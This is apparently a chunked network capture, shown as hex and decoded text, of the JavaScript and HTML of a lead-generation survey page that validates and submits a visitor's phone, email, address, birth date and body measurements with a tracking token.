                                                                          2023-11-21 16:58:41 UTC592INData Raw: 64 20 73 65 6c 65 63 74 65 64 3e 4d 6f 6e 74 68 3c 2f 6f 70 74 69 6f 6e 3e 22 3e 0a 09 09 09 09 09 09 09 09 09 20 3c 2f 73 65 6c 65 63 74 3e 0a 09 09 09 09 09 09 09 09 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 09 09 09 09 3c 6c 61 62 65 6c 20 69 64 3d 22 64 61 79 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 20 63 6f 6c 2d 6c 67 2d 34 20 62 69 72 74 68 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 09 09 09 09 20 3c 73 65 6c 65 63 74 20 69 64 3d 22 64 61 79 73 22 20 63 6c 61 73 73 3d 22 62 64 61 74 61 22 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 44 61 79 27 20 64 69 73 61 62 6c 65 64 20 73 65 6c 65 63 74 65 64 3e 44 61 79 3c 2f 6f 70 74 69 6f 6e 3e 22 3e 0a 09 09 09 09 09 09 09 09 09 20 3c 2f 73 65 6c 65 63 74 3e
                                                                          Data Ascii: d selected>Month</option>"> </select></label><label id="day" class="col-12 col-lg-4 birth-container"> <select id="days" class="bdata"><option value='Day' disabled selected>Day</option>"> </select>
                                                                          2023-11-21 16:58:41 UTC593INData Raw: 69 5d 2e 76 61 6c 75 65 3d 3d 27 53 6b 69 70 27 20 7c 7c 20 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 76 61 6c 75 65 3d 3d 27 73 6b 69 70 27 29 7b 0a 09 09 09 09 73 6b 69 70 42 74 6e 3d 74 72 75 65 3b 0a 09 09 09 09 24 28 27 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 27 29 2e 61 70 70 65 6e 64 28 60 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6b 69 70 20 6d 74 2d 32 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 3a 61 75 74 6f 22 20 6f 6e 43 6c 69 63 6b 3d 22 6e 65 78 74 51 75 65 73 74 69 6f 6e 28 27 60 2b 64 2e 74 72 61 63 6b 54 6f 6b 65 6e 2b 60 27 2c 60 2b 73 75 72 76 65 79 69 64 2b 60 2c 60 2b 64 2e 71 75 65 73 74
                                                                          Data Ascii: i].value=='Skip' || d.answers[i].value=='skip'){skipBtn=true;$('#questionBody').append(`<button class="btn btn-outline-light btn-skip mt-2" style="display: block; margin:auto" onClick="nextQuestion('`+d.trackToken+`',`+surveyid+`,`+d.quest
                                                                          2023-11-21 16:58:41 UTC595INData Raw: 75 74 74 6f 6e 20 62 68 2d 63 6f 6c 6f 72 20 62 74 78 68 2d 63 6f 6c 6f 72 22 20 6f 6e 43 6c 69 63 6b 3d 22 76 61 6c 69 64 61 74 65 41 6c 6c 28 27 60 2b 64 2e 74 72 61 63 6b 54 6f 6b 65 6e 2b 60 27 2c 60 2b 73 75 72 76 65 79 69 64 2b 60 2c 60 2b 64 2e 71 75 65 73 74 69 6f 6e 49 44 2b 60 2c 27 60 2b 61 6e 73 77 65 72 73 2b 60 27 2c 27 60 2b 64 2e 66 6f 72 6d 4e 61 6d 65 2b 60 27 2c 27 60 2b 61 6e 73 77 65 72 73 56 61 6c 75 65 73 2b 60 27 2c 27 60 2b 76 61 6c 50 2b 60 27 2c 27 60 2b 76 61 6c 45 2b 60 27 2c 27 60 2b 76 61 6c 5a 2b 60 27 2c 27 60 2b 76 61 6c 4e 2b 60 27 2c 27 60 2b 76 61 6c 57 48 2b 60 27 2c 27 60 2b 76 61 6c 4c 4e 2b 60 27 2c 27 60 2b 76 61 6c 42 2b 60 27 29 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 60 2b 24 28 27 23 73 75 62 6d 69 74
                                                                          Data Ascii: utton bh-color btxh-color" onClick="validateAll('`+d.trackToken+`',`+surveyid+`,`+d.questionID+`,'`+answers+`','`+d.formName+`','`+answersValues+`','`+valP+`','`+valE+`','`+valZ+`','`+valN+`','`+valWH+`','`+valLN+`','`+valB+`')" type="button">`+$('#submit
                                                                          2023-11-21 16:58:41 UTC596INData Raw: 73 77 65 72 49 44 2c 66 6f 72 6d 4e 61 6d 65 2c 61 6e 73 77 65 72 56 61 6c 75 65 2c 73 65 6e 64 3d 22 74 72 75 65 22 29 7b 0a 09 76 61 72 20 70 68 6f 6e 65 3d 24 28 27 23 70 68 6f 6e 65 2d 64 61 74 61 27 29 2e 76 61 6c 28 29 3b 0a 09 76 61 72 20 70 68 6f 6e 65 5f 76 61 6c 3d 20 70 68 6f 6e 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 32 5d 3b 0a 09 69 66 28 70 68 6f 6e 65 2e 6c 65 6e 67 74 68 3d 3d 31 32 20 26 26 20 70 68 6f 6e 65 21 3d 27 78 78 78 2d 78 78 78 2d 78 78 78 78 27 20 26 26 20 28 70 68 6f 6e 65 2e 6d 61 74 63 68 28 2f 2d 2f 67 29 20 7c 7c 20 5b 5d 29 2e 6c 65 6e 67 74 68 3d 3d 32 20 26 26 20 70 68 6f 6e 65 5f 76 61 6c 2e 6c 65 6e 67 74 68 3d 3d 34 29 7b 0a 09 09 24 28 27 23 70 68 6f 6e 65 2d 64 61 74 61 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28
                                                                          Data Ascii: swerID,formName,answerValue,send="true"){var phone=$('#phone-data').val();var phone_val= phone.split("-")[2];if(phone.length==12 && phone!='xxx-xxx-xxxx' && (phone.match(/-/g) || []).length==2 && phone_val.length==4){$('#phone-data').removeClass(
                                                                          2023-11-21 16:58:41 UTC597INData Raw: 38 30 30 30 0d 0a 20 62 61 64 3d 66 61 6c 73 65 3b 0a 09 0a 09 69 66 28 65 6d 61 69 6c 73 31 2e 6c 65 6e 67 74 68 3e 3d 33 20 26 26 20 65 6d 61 69 6c 73 32 21 3d 22 22 20 26 26 20 65 6d 61 69 6c 73 32 21 3d 75 6e 64 65 66 69 6e 65 64 20 26 26 20 28 65 6d 61 69 6c 73 32 2e 6d 61 74 63 68 28 2f 5c 2e 2f 67 29 20 7c 7c 20 5b 5d 29 2e 6c 65 6e 67 74 68 3c 3d 32 20 26 26 20 2f 5e 5b 61 2d 7a 5d 2a 24 2f 2e 74 65 73 74 28 65 6d 61 69 6c 2e 63 68 61 72 41 74 28 65 6d 61 69 6c 2e 6c 65 6e 67 74 68 2d 31 29 29 29 7b 0a 09 09 76 61 72 20 64 6f 6d 3d 20 65 6d 61 69 6c 73 32 2e 73 70 6c 69 74 28 22 2e 22 29 5b 30 5d 3b 0a 09 09 76 61 72 20 64 6f 6d 32 3d 20 65 6d 61 69 6c 73 32 2e 73 70 6c 69 74 28 22 2e 22 29 5b 31 5d 3b 0a 09 09 76 61 72 20 64 6f 6d 33 3d 20 65 6d
                                                                          Data Ascii: 8000 bad=false;if(emails1.length>=3 && emails2!="" && emails2!=undefined && (emails2.match(/\./g) || []).length<=2 && /^[a-z]*$/.test(email.charAt(email.length-1))){var dom= emails2.split(".")[0];var dom2= emails2.split(".")[1];var dom3= em
                                                                          2023-11-21 16:58:41 UTC599INData Raw: 72 65 6d 6f 76 65 28 29 3b 0a 09 09 09 09 09 09 69 66 28 73 65 6e 64 3d 3d 22 74 72 75 65 22 29 7b 0a 09 09 09 09 09 09 09 76 61 72 20 64 61 74 61 20 3d 20 7b 22 74 72 61 63 6b 69 6e 67 47 75 69 64 22 3a 20 24 28 27 23 74 72 61 63 6b 69 6e 67 47 75 69 64 27 29 2e 76 61 6c 28 29 2c 20 22 65 6d 61 69 6c 22 3a 20 65 6d 61 69 6c 2c 20 22 6f 70 74 6f 75 74 22 3a 20 66 61 6c 73 65 2c 20 22 61 63 63 65 70 74 65 64 22 3a 20 74 72 75 65 7d 0a 09 09 09 09 09 09 09 6c 65 61 64 67 65 6e 46 6f 72 6d 28 64 61 74 61 29 2e 74 68 65 6e 28 28 64 61 74 61 29 20 3d 3e 20 7b 0a 09 09 09 09 09 09 09 09 6e 65 78 74 51 75 65 73 74 69 6f 6e 28 74 6f 6b 65 6e 2c 73 69 64 2c 71 75 65 73 74 69 6f 6e 2c 61 6e 73 77 65 72 2c 66 6f 72 6d 4e 61 6d 65 2c 61 6e 73 77 65 72 56 61 6c 75 65
                                                                          Data Ascii: remove();if(send=="true"){var data = {"trackingGuid": $('#trackingGuid').val(), "email": email, "optout": false, "accepted": true}leadgenForm(data).then((data) => {nextQuestion(token,sid,question,answer,formName,answerValue
                                                                          2023-11-21 16:58:41 UTC600INData Raw: 3c 2f 64 69 76 3e 22 29 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 27 23 61 64 76 45 6d 61 69 6c 53 74 61 6e 64 61 72 64 20 2e 69 6e 70 75 74 2d 63 6f 6e 74 61 69 6e 65 72 27 29 3b 0a 09 7d 0a 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 76 61 6c 69 64 61 74 65 5a 69 70 28 74 6f 6b 65 6e 2c 73 49 44 2c 71 75 65 73 74 69 6f 6e 49 44 2c 61 6e 73 77 65 72 49 44 2c 66 6f 72 6d 4e 61 6d 65 2c 61 6e 73 77 65 72 56 61 6c 75 65 2c 73 65 6e 64 3d 22 74 72 75 65 22 29 7b 0a 09 76 61 72 20 73 74 72 65 65 74 3d 24 28 22 23 73 74 72 65 65 74 2d 64 61 74 61 22 29 2e 76 61 6c 28 29 3b 0a 09 76 61 72 20 7a 69 70 3d 24 28 22 23 7a 69 70 2d 64 61 74 61 22 29 2e 76 61 6c 28 29 3b 0a 09 76 61 72 20 63 69 74 79 3d 24 28 22 23 63 69 74 79 2d 64 61 74 61 22 29 2e 76 61 6c 28 29 3b 0a 09
                                                                          Data Ascii: </div>").insertBefore('#advEmailStandard .input-container');}}function validateZip(token,sID,questionID,answerID,formName,answerValue,send="true"){var street=$("#street-data").val();var zip=$("#zip-data").val();var city=$("#city-data").val();
                                                                          2023-11-21 16:58:41 UTC601INData Raw: 65 6e 64 5a 69 70 49 70 28 74 6f 6b 65 6e 29 7b 0a 09 76 61 72 20 64 61 74 61 20 3d 20 7b 0a 09 09 22 74 72 61 63 6b 69 6e 67 47 75 69 64 22 3a 20 74 6f 6b 65 6e 2c 20 0a 09 09 22 70 6f 73 74 61 6c 43 6f 64 65 22 3a 20 24 28 27 23 69 70 5a 69 70 27 29 2e 76 61 6c 28 29 2c 20 0a 09 09 22 73 74 61 74 65 22 3a 20 24 28 27 23 69 70 53 74 61 74 65 27 29 2e 76 61 6c 28 29 2c 20 0a 09 09 22 63 69 74 79 22 3a 20 24 28 27 23 69 70 43 69 74 79 27 29 2e 76 61 6c 28 29 2c 20 20 0a 09 09 22 63 6f 75 6e 74 72 79 22 3a 20 24 28 27 23 69 70 43 6f 75 6e 74 72 79 27 29 2e 76 61 6c 28 29 2c 20 20 0a 09 09 22 6f 70 74 6f 75 74 22 3a 20 66 61 6c 73 65 2c 20 0a 09 09 22 61 63 63 65 70 74 65 64 22 3a 20 74 72 75 65 0a 09 7d 0a 09 6c 65 61 64 67 65 6e 46 6f 72 6d 28 64 61 74 61
                                                                          Data Ascii: endZipIp(token){var data = {"trackingGuid": token, "postalCode": $('#ipZip').val(), "state": $('#ipState').val(), "city": $('#ipCity').val(), "country": $('#ipCountry').val(), "optout": false, "accepted": true}leadgenForm(data
                                                                          2023-11-21 16:58:41 UTC603INData Raw: 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 6f 72 6d 62 61 64 22 29 3b 0a 09 09 24 28 22 23 77 65 69 67 68 74 2d 64 61 74 61 22 29 2e 61 74 74 72 28 22 64 61 74 61 22 2c 22 74 72 75 65 22 29 3b 0a 09 09 69 66 28 73 65 6e 64 3d 3d 22 74 72 75 65 22 29 7b 0a 09 09 09 6c 65 61 64 67 65 6e 46 6f 72 6d 28 64 61 74 61 29 2e 74 68 65 6e 28 28 64 61 74 61 29 20 3d 3e 20 7b 0a 09 09 09 09 6e 65 78 74 51 75 65 73 74 69 6f 6e 28 74 6f 6b 65 6e 2c 73 49 44 2c 71 75 65 73 74 69 6f 6e 49 44 2c 61 6e 73 77 65 72 49 44 2c 66 6f 72 6d 4e 61 6d 65 2c 61 6e 73 77 65 72 56 61 6c 75 65 29 3b 0a 09 09 09 7d 29 3b 0a 09 09 7d 0a 09 7d 65 6c 73 65 7b 0a 09 09 24 28 22 23 77 65 69 67 68 74 62 61 64 22 29 2e 73 68 6f 77 28 29 3b 0a 09 09 24 28 22 23 77 65 69 67 68 74 2d 64 61 74 61 22
                                                                          Data Ascii: emoveClass("formbad");$("#weight-data").attr("data","true");if(send=="true"){leadgenForm(data).then((data) => {nextQuestion(token,sID,questionID,answerID,formName,answerValue);});}}else{$("#weightbad").show();$("#weight-data"
                                                                          2023-11-21 16:58:41 UTC604INData Raw: 44 2c 66 6f 72 6d 4e 61 6d 65 2c 61 6e 73 77 65 72 56 61 6c 75 65 73 2c 22 66 61 6c 73 65 22 29 3b 0a 09 09 73 65 6e 64 42 3d 24 28 22 23 62 69 72 74 68 64 61 79 2d 64 61 74 61 22 29 2e 61 74 74 72 28 22 64 61 74 61 22 29 3b 0a 09 7d 0a 09 69 66 28 76 61 6c 57 48 3d 3d 27 74 72 75 65 27 29 7b 0a 09 09 76 61 6c 69 64 61 74 65 48 65 69 67 68 74 46 28 74 6f 6b 65 6e 2c 73 49 44 2c 71 75 65 73 74 69 6f 6e 49 44 2c 61 6e 73 77 65 72 49 44 2c 66 6f 72 6d 4e 61 6d 65 2c 61 6e 73 77 65 72 56 61 6c 75 65 73 2c 22 66 61 6c 73 65 22 29 3b 0a 09 09 76 61 6c 69 64 61 74 65 48 65 69 67 68 74 49 28 74 6f 6b 65 6e 2c 73 49 44 2c 71 75 65 73 74 69 6f 6e 49 44 2c 61 6e 73 77 65 72 49 44 2c 66 6f 72 6d 4e 61 6d 65 2c 61 6e 73 77 65 72 56 61 6c 75 65 73 2c 22 66 61 6c 73 65
                                                                          Data Ascii: D,formName,answerValues,"false");sendB=$("#birthday-data").attr("data");}if(valWH=='true'){validateHeightF(token,sID,questionID,answerID,formName,answerValues,"false");validateHeightI(token,sID,questionID,answerID,formName,answerValues,"false
                                                                          2023-11-21 16:58:41 UTC605INData Raw: 22 23 6d 6f 6e 74 68 73 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 6f 70 74 69 6f 6e 3a 73 65 6c 65 63 74 65 64 22 29 2e 76 61 6c 28 29 3b 0a 09 09 09 64 61 74 61 2e 6d 6f 6e 74 68 4f 66 42 69 72 74 68 3d 24 28 22 23 64 61 79 73 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 6f 70 74 69 6f 6e 3a 73 65 6c 65 63 74 65 64 22 29 2e 76 61 6c 28 29 3b 0a 09 09 09 64 61 74 61 2e 79 65 61 72 4f 66 42 69 72 74 68 3d 24 28 22 23 79 65 61 72 73 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 6f 70 74 69 6f 6e 3a 73 65 6c 65 63 74 65 64 22 29 2e 76 61 6c 28 29 3b 0a 09 09 7d 0a 09 09 6c 65 61 64 67 65 6e 46 6f 72 6d 28 64 61 74 61 29 2e 74 68 65 6e 28 28 64 61 74 61 29 20 3d 3e 20 7b 0a 09 09 09 6e 65 78 74 51 75 65 73 74 69 6f 6e 28 74 6f 6b 65 6e 2c 73 49 44 2c 71 75 65 73 74 69 6f 6e
                                                                          Data Ascii: "#months").children("option:selected").val();data.monthOfBirth=$("#days").children("option:selected").val();data.yearOfBirth=$("#years").children("option:selected").val();}leadgenForm(data).then((data) => {nextQuestion(token,sID,question
                                                                          2023-11-21 16:58:41 UTC607INData Raw: 74 61 22 29 2e 61 74 74 72 28 22 64 61 74 61 22 2c 22 74 72 75 65 22 29 3b 0a 09 7d 0a 09 69 66 28 76 61 6c 69 64 3d 3d 32 29 7b 0a 09 09 69 66 28 73 65 6e 64 3d 3d 22 74 72 75 65 22 29 7b 0a 09 09 09 76 61 72 20 64 61 74 61 20 3d 20 7b 0a 09 09 09 09 22 74 72 61 63 6b 69 6e 67 47 75 69 64 22 3a 20 74 6f 6b 65 6e 2c 0a 09 09 09 09 22 6c 61 73 74 4e 61 6d 65 22 3a 20 6c 61 73 74 4e 61 6d 65 2e 74 72 69 6d 28 29 2c 0a 09 09 09 09 22 6f 70 74 6f 75 74 22 3a 20 66 61 6c 73 65 2c 20 22 61 63 63 65 70 74 65 64 22 3a 20 74 72 75 65 0a 09 09 09 7d 0a 09 09 09 6c 65 61 64 67 65 6e 46 6f 72 6d 28 64 61 74 61 29 2e 74 68 65 6e 28 28 64 61 74 61 29 20 3d 3e 20 7b 0a 09 09 09 09 6e 65 78 74 51 75 65 73 74 69 6f 6e 28 74 6f 6b 65 6e 2c 73 49 44 2c 71 75 65 73 74 69 6f
                                                                          Data Ascii: ta").attr("data","true");}if(valid==2){if(send=="true"){var data = {"trackingGuid": token,"lastName": lastName.trim(),"optout": false, "accepted": true}leadgenForm(data).then((data) => {nextQuestion(token,sID,questio
                                                                          2023-11-21 16:58:41 UTC608INData Raw: 20 64 3c 64 61 79 44 61 74 61 2e 6c 65 6e 67 74 68 3b 20 64 2b 2b 29 7b 0a 09 09 24 28 22 23 64 61 79 73 22 29 2e 61 70 70 65 6e 64 28 60 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 60 2b 64 61 79 44 61 74 61 5b 64 5d 2b 60 22 3e 60 2b 64 61 79 44 61 74 61 5b 64 5d 2b 60 3c 2f 6f 70 74 69 6f 6e 3e 60 29 3b 0a 09 7d 0a 09 24 28 22 23 64 61 79 73 22 29 2e 70 72 65 70 65 6e 64 28 60 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 61 79 22 20 64 69 73 61 62 6c 65 64 20 73 65 6c 65 63 74 65 64 3e 44 61 79 3c 2f 6f 70 74 69 6f 6e 3e 60 29 3b 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 64 61 79 73 49 6e 4d 6f 6e 74 68 28 29 20 7b 0a 09 09 76 61 72 20 6d 3d 24 28 22 73 65 6c 65 63 74 23 6d 6f 6e 74 68 73 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 6f 70 74 69 6f 6e 3a 73 65
                                                                          Data Ascii: d<dayData.length; d++){$("#days").append(`<option value="`+dayData[d]+`">`+dayData[d]+`</option>`);}$("#days").prepend(`<option value="Day" disabled selected>Day</option>`);}function daysInMonth() {var m=$("select#months").children("option:se
                                                                          2023-11-21 16:58:41 UTC609INData Raw: 74 75 72 6e 20 66 61 6c 73 65 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 68 6f 77 53 74 72 65 65 74 53 74 61 74 65 28 29 7b 0a 09 24 28 27 2e 73 74 61 74 65 27 29 2e 6f 6e 28 27 63 68 61 6e 67 65 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 20 73 74 61 74 65 5f 73 65 6c 65 63 74 65 64 3d 24 28 22 73 65 6c 65 63 74 2e 73 74 61 74 65 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 6f 70 74 69 6f 6e 3a 73 65 6c 65 63 74 65 64 22 29 2e 76 61 6c 28 29 3b 0a 09 7d 29 3b 0a 09 69 66 28 24 28 27 23 7a 69 70 2d 64 61 74 61 27 29 2e 76 61 6c 28 29 21 3d 7a 69 70 63 6f 64 65 29 7b 0a 09 09 7a 69 70 63 6f 64 65 20 3d 24 28 27 23 7a 69 70 2d 64 61 74 61 27 29 2e 76 61 6c 28 29 3b 0a 09 09 69 66 28 7a 69 70 63 6f 64 65 2e 6c 65 6e 67 74 68 3d 3d 35 29 7b 0a 09 09 09 24
                                                                          Data Ascii: turn false;}function showStreetState(){$('.state').on('change', function(){ state_selected=$("select.state").children("option:selected").val();});if($('#zip-data').val()!=zipcode){zipcode =$('#zip-data').val();if(zipcode.length==5){$
                                                                          2023-11-21 16:58:41 UTC611INData Raw: 09 74 79 70 65 3a 20 27 50 4f 53 54 27 2c 0a 09 09 09 09 09 7d 29 3b 0a 09 09 09 09 7d 0a 09 09 09 09 72 65 73 6f 6c 76 65 28 64 61 74 61 29 0a 09 09 09 7d 2c 0a 09 09 09 65 72 72 6f 72 3a 20 0a 09 09 09 66 75 6e 63 74 69 6f 6e 20 28 65 72 72 6f 72 29 20 7b 0a 09 09 09 09 72 65 6a 65 63 74 28 65 72 72 6f 72 29 0a 09 09 09 7d 0a 09 09 7d 29 3b 0a 09 7d 29 3b 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 65 6d 61 69 6c 50 69 78 65 6c 28 65 6d 61 69 6c 3d 27 74 65 73 74 40 67 6d 61 69 6c 2e 63 6f 6d 27 29 7b 0a 09 24 2e 61 6a 61 78 28 7b 0a 09 09 75 72 6c 3a 20 22 22 2c 0a 09 09 64 61 74 61 3a 27 5f 74 79 70 65 3d 61 6a 61 78 26 5f 61 63 74 69 6f 6e 3d 6d 61 73 74 65 72 2d 70 69 78 65 6c 5f 65 6d 61 69 6c 26 73 32 3d 27 2b 63 6c 69 63 6b 5f 69 64 2b 27 26 73 33 3d 27
                                                                          Data Ascii: type: 'POST',});}resolve(data)},error: function (error) {reject(error)}});});}function emailPixel(email='test@gmail.com'){$.ajax({url: "",data:'_type=ajax&_action=master-pixel_email&s2='+click_id+'&s3='
                                                                          2023-11-21 16:58:41 UTC612INData Raw: 75 74 5f 64 6f 75 62 6c 65 22 3b 0a 09 09 76 61 72 20 69 6e 70 75 74 5f 72 61 64 69 75 73 3d 22 69 6e 70 75 74 5f 72 61 64 69 75 73 22 3b 0a 09 09 76 61 72 20 69 6e 70 75 74 5f 6c 61 72 67 65 3d 22 69 6e 70 75 74 5f 6c 61 72 67 65 22 3b 0a 09 09 6c 65 74 20 62 74 6e 3d 22 22 3b 0a 09 09 6c 65 74 20 69 6e 70 75 74 3d 22 22 3b 0a 09 09 69 66 28 76 2e 61 63 74 49 64 20 3d 3d 20 22 31 22 29 7b 0a 09 09 09 69 66 28 5b 27 31 27 2c 27 32 27 2c 27 33 27 2c 27 31 34 27 2c 27 31 35 27 2c 27 31 36 27 5d 2e 69 6e 63 6c 75 64 65 73 28 76 2e 72 65 67 49 64 29 29 7b 0a 09 09 09 09 2f 2a 20 24 28 22 23 63 6f 6e 74 61 69 6e 65 72 2d 73 75 72 76 65 79 22 29 2e 63 73 73 28 7b 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3a 20 27 75 72 6c 28 61 73 73 65 74 73 2f 69 6d 61 67
                                                                          Data Ascii: ut_double";var input_radius="input_radius";var input_large="input_large";let btn="";let input="";if(v.actId == "1"){if(['1','2','3','14','15','16'].includes(v.regId)){/* $("#container-survey").css({backgroundImage: 'url(assets/imag
                                                                          2023-11-21 16:58:41 UTC613INData Raw: 6c 6f 72 22 20 6f 6e 43 6c 69 63 6b 3d 22 76 61 6c 69 64 61 74 65 44 61 74 61 28 60 2b 76 2e 72 65 67 49 64 2b 60 29 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 60 2b 24 28 27 23 73 75 62 6d 69 74 2d 6c 61 6e 67 27 29 2e 76 61 6c 28 29 2b 60 3c 2f 62 75 74 74 6f 6e 3e 60 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 69 6e 70 75 74 3d 20 60 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 60 2b 69 6e 70 75 74 5f 61 6c 6f 6e 65 2b 60 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 70 68 6f 6e 65 22 3e 3c 2f 69 3e 3c 69 6e 70 75 74 20 69 64 3d 22 70 68 6f 6e 65 2d 64 61 74 61 55 22 20 63 6c 61 73 73 3d 22 60 2b 69 6e 70
                                                                          Data Ascii: lor" onClick="validateData(`+v.regId+`)" type="button">`+$('#submit-lang').val()+`</button>`;}input= `<div class="input-container"><div class="`+input_alone+`"><i class="fas fa-phone"></i><input id="phone-dataU" class="`+inp
                                                                          2023-11-21 16:58:41 UTC615INData Raw: 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 09 09 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 60 2b 69 6e 70 75 74 5f 61 6c 6f 6e 65 2b 60 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 6c 6f 63 61 74 69 6f 6e 2d 61 72 72 6f 77 22 3e 3c 2f 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 7a 69 70 2d 64 61 74 61 55 22 20 76 61 6c 75 65 3d 22 60 2b 7a 69 70 63 6f 64 65 55 52 4c 2b 60 22 20 63 6c 61 73 73 3d 22 60 2b 69 6e 70 75 74 5f 6c 61 72 67 65 2b 60 20 69 6e 70 75 74 2d 64 61 74 61 55 20 60 2b 69 6e 70 75 74 5f 72 61 64 69 75 73 2b 60 22 20 64 61 74 61 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 5a 69 70 20 43 6f 64 65
                                                                          Data Ascii: t-container"> <div class="`+input_alone+`"><i class="fas fa-location-arrow"></i><input id="zip-dataU" value="`+zipcodeURL+`" class="`+input_large+` input-dataU `+input_radius+`" data="false" type="number" placeholder="Zip Code
                                                                          2023-11-21 16:58:41 UTC616INData Raw: 76 61 6c 75 65 2e 6c 65 6e 67 74 68 3e 31 29 7b 0a 09 09 09 09 09 09 09 09 09 09 09 76 61 72 20 6e 75 6d 5f 73 66 3d 74 68 69 73 2e 76 61 6c 75 65 3b 0a 09 09 09 09 09 09 09 09 09 09 09 76 61 72 20 6e 75 6d 5f 63 66 3d 27 27 0a 09 09 09 09 09 09 09 09 09 09 09 6e 75 6d 5f 63 66 3d 6e 75 6d 5f 73 66 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 29 0a 09 09 09 09 09 09 09 09 09 09 09 74 68 69 73 2e 76 61 6c 75 65 3d 6e 75 6d 5f 63 66 3b 0a 09 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 09 09 69 66 28 74 68 69 73 2e 76 61 6c 75 65 3e 37 20 7c 7c 20 74 68 69 73 2e 76 61 6c 75 65 3c 34 29 7b 0a 09 09 09 09 09 09 09 09 09 09 09 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 3b 0a 09 09 09 09 09 09 09 09 09 09 7d 22 0a 0a 09 09 09 09 09 09 09 09 09 6f 6e 6b 65
                                                                          Data Ascii: value.length>1){var num_sf=this.value;var num_cf=''num_cf=num_sf.substring(0,1)this.value=num_cf;}if(this.value>7 || this.value<4){this.value='';}"onke
                                                                          2023-11-21 16:58:41 UTC620INData Raw: 73 2e 76 61 6c 75 65 3d 27 27 3b 0a 09 09 09 09 09 09 09 09 09 09 7d 22 0a 09 09 09 09 09 09 09 09 09 6f 6e 6b 65 79 70 72 65 73 73 20 3d 22 72 65 74 75 72 6e 20 61 6c 70 68 61 28 65 76 65 6e 74 29 3b 22 0a 09 09 09 09 09 09 09 09 09 6f 6e 74 6f 75 63 68 73 74 61 72 74 3d 22 74 68 69 73 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 27 72 65 61 64 6f 6e 6c 79 27 29 3b 22 20 0a 09 09 09 09 09 09 09 09 09 6f 6e 66 6f 63 75 73 3d 22 74 68 69 73 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 27 72 65 61 64 6f 6e 6c 79 27 29 3b 22 0a 09 09 09 09 09 09 09 09 09 69 6e 70 75 74 6d 6f 64 65 3d 22 74 65 6c 22 0a 09 09 09 09 09 09 09 09 09 6d 61 78 6c 65 6e 67 74 68 3d 22 32 22 20 0a 09 09 09 09 09 09 09 09 09 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e
                                                                          Data Ascii: s.value='';}"onkeypress ="return alpha(event);"ontouchstart="this.removeAttribute('readonly');" onfocus="this.removeAttribute('readonly');"inputmode="tel"maxlength="2" ></div>
                                                                          2023-11-21 16:58:41 UTC623INData Raw: 09 09 09 6d 61 78 6c 65 6e 67 74 68 3d 22 33 22 20 0a 09 09 09 09 09 09 09 09 09 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 60 2b 62 74 6e 2b 60 0a 09 09 09 09 09 09 20 20 20 3c 2f 64 69 76 3e 60 3b 0a 09 09 09 09 09 24 28 27 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 27 29 2e 61 70 70 65 6e 64 28 69 6e 70 75 74 29 3b 09 0a 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 0a 09 09 09 09 63 61 73 65 20 22 31 32 22 3a 0a 09 09 09 09 09 69 66 28 64 61 74 61 2e 71 75 65 73 74 69 6f 6e 73 5f 74 79 70 65 5f 69 64 21 3d 27 32 27 29 7b 0a 09 09 09 09 09 09 69 6e 70 75 74 5f 61 6c 6f 6e 65 3d 22 69 6e 70 75 74 5f 61 6c 6f 6e 65 22 3b 0a 09 09 09 09 09 09 69 6e 70 75 74 5f 72 61 64 